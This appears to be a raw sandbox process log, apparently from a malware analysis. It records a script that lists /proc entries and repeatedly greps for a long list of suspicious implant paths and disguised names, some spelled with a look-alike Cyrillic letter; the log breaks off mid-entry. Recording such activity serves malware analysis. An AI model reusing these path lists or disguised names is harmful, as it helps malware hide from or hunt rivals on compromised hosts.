- /bin/ls
  ls -latrh /proc/718
  2⤵
  PID:1054
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1058
- /bin/ls
  ls -latrh /proc/72
  2⤵
  PID:1063
- /bin/grep
  grep exe
  2⤵
  PID:1064
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1066
- /bin/grep
  grep exe
  2⤵
  PID:1070
- /bin/ls
  ls -latrh /proc/723
  2⤵
  PID:1069
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1072
- /bin/grep
  grep exe
  2⤵
  PID:1077
- /bin/ls
  ls -latrh /proc/73
  2⤵
  PID:1076
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1081
- /bin/grep
  grep exe
  2⤵
  PID:1085
- /bin/ls
  ls -latrh /proc/74
  2⤵
  PID:1083
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1087
- /bin/grep
  grep exe
  2⤵
  PID:1091
- /bin/ls
  ls -latrh /proc/75
  2⤵
  PID:1090
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1094
- /bin/grep
  grep exe
  2⤵
  PID:1097
- /bin/ls
  ls -latrh /proc/76
  2⤵
  PID:1096
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1101
- /bin/ls
  ls -latrh /proc/77
  2⤵
  PID:1104
- /bin/grep
  grep exe
  2⤵
  PID:1105
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1107
- /bin/ls
  ls -latrh /proc/78
  2⤵
  PID:1110
- /bin/grep
  grep exe
  2⤵
  PID:1111
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1113
- /bin/grep
  grep exe
  2⤵
  PID:1116
- /bin/ls
  ls -latrh /proc/8
  2⤵
  PID:1115
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1118
- /bin/ls
  ls -latrh /proc/81
  2⤵
  PID:1121
- /bin/grep
  grep exe
  2⤵
  PID:1122
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1124
- /bin/grep
  grep exe
  2⤵
  PID:1127
- /bin/ls
  ls -latrh /proc/9
  2⤵
  PID:1126
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1129
- /bin/grep
  grep exe
  2⤵
  PID:1132
- /bin/ls
  ls -latrh /proc/buddyinfo
  2⤵
  PID:1131
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1134
- /bin/ls
  ls -latrh /proc/bus
  2⤵
  PID:1136
- /bin/grep
  grep exe
  2⤵
  PID:1137
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1139
- /bin/grep
  grep exe
  2⤵
  PID:1142
- /bin/ls
  ls -latrh /proc/cgroups
  2⤵
  PID:1141
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1144
- /bin/grep
  grep exe
  2⤵
  PID:1147
- /bin/ls
  ls -latrh /proc/cmdline
  2⤵
  PID:1146
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1149
- /bin/grep
  grep exe
  2⤵
  PID:1152
- /bin/ls
  ls -latrh /proc/consoles
  2⤵
  PID:1151
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1154
- /bin/grep
  grep exe
  2⤵
  PID:1157
- /bin/ls
  ls -latrh /proc/cpuinfo
  2⤵
  PID:1156
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1159
- /bin/grep
  grep exe
  2⤵
  PID:1162
- /bin/ls
  ls -latrh /proc/crypto
  2⤵
  PID:1161
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1164
- /bin/ls
  ls -latrh /proc/devices
  2⤵
  PID:1166
- /bin/grep
  grep exe
  2⤵
  PID:1167
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1169
- /bin/ls
  ls -latrh /proc/device-tree
  2⤵
  PID:1171
- /bin/grep
  grep exe
  2⤵
  PID:1172
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1174
- /bin/grep
  grep exe
  2⤵
  PID:1177
- /bin/ls
  ls -latrh /proc/diskstats
  2⤵
  PID:1176
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1179
- /bin/grep
  grep exe
  2⤵
  PID:1182
- /bin/ls
  ls -latrh /proc/dma
  2⤵
  PID:1181
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1184
- /bin/grep
  grep exe
  2⤵
  PID:1187
- /bin/ls
  ls -latrh /proc/driver
  2⤵
  PID:1186
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1189
- /bin/ls
  ls -latrh /proc/execdomains
  2⤵
  PID:1191
- /bin/grep
  grep exe
  2⤵
  PID:1192
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1194
- /bin/ls
  ls -latrh /proc/fb
  2⤵
  PID:1196
- /bin/grep
  grep exe
  2⤵
  PID:1197
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1199
- /bin/grep
  grep exe
  2⤵
  PID:1202
- /bin/ls
  ls -latrh /proc/filesystems
  2⤵
  PID:1201
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1204
- /bin/ls
  ls -latrh /proc/fs
  2⤵
  PID:1206
- /bin/grep
  grep exe
  2⤵
  PID:1207
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1209
- /bin/grep
  grep exe
  2⤵
  PID:1212
- /bin/ls
  ls -latrh /proc/interrupts
  2⤵
  PID:1211
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1214
- /bin/grep
  grep exe
  2⤵
  PID:1217
- /bin/ls
  ls -latrh /proc/iomem
  2⤵
  PID:1216
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1219
- /bin/ls
  ls -latrh /proc/ioports
  2⤵
  PID:1221
- /bin/grep
  grep exe
  2⤵
  PID:1222
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1224
- /bin/grep
  grep exe
  2⤵
  PID:1227
- /bin/ls
  ls -latrh /proc/irq
  2⤵
  PID:1226
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1229
- /bin/ls
  ls -latrh /proc/kallsyms
  2⤵
  PID:1231
- /bin/grep
  grep exe
  2⤵
  PID:1232
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1234
- /bin/ls
  ls -latrh /proc/kcore
  2⤵
  PID:1236
- /bin/grep
  grep exe
  2⤵
  PID:1237
- /bin/grep
  grep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"
  2⤵
  PID:1239
- /bin/ls
  ls -latrh /proc/keys
  2⤵
  PID:1241
- /bin/grep
  grep exe
  2⤵
  PID:1242
- /bin/grep
